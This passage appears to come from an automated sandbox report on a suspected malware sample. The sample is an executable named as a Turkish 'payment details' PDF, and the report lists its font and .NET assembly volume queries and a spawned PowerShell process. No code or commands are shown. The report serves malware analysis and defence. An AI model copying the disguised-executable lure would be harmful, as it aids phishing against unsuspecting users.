                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
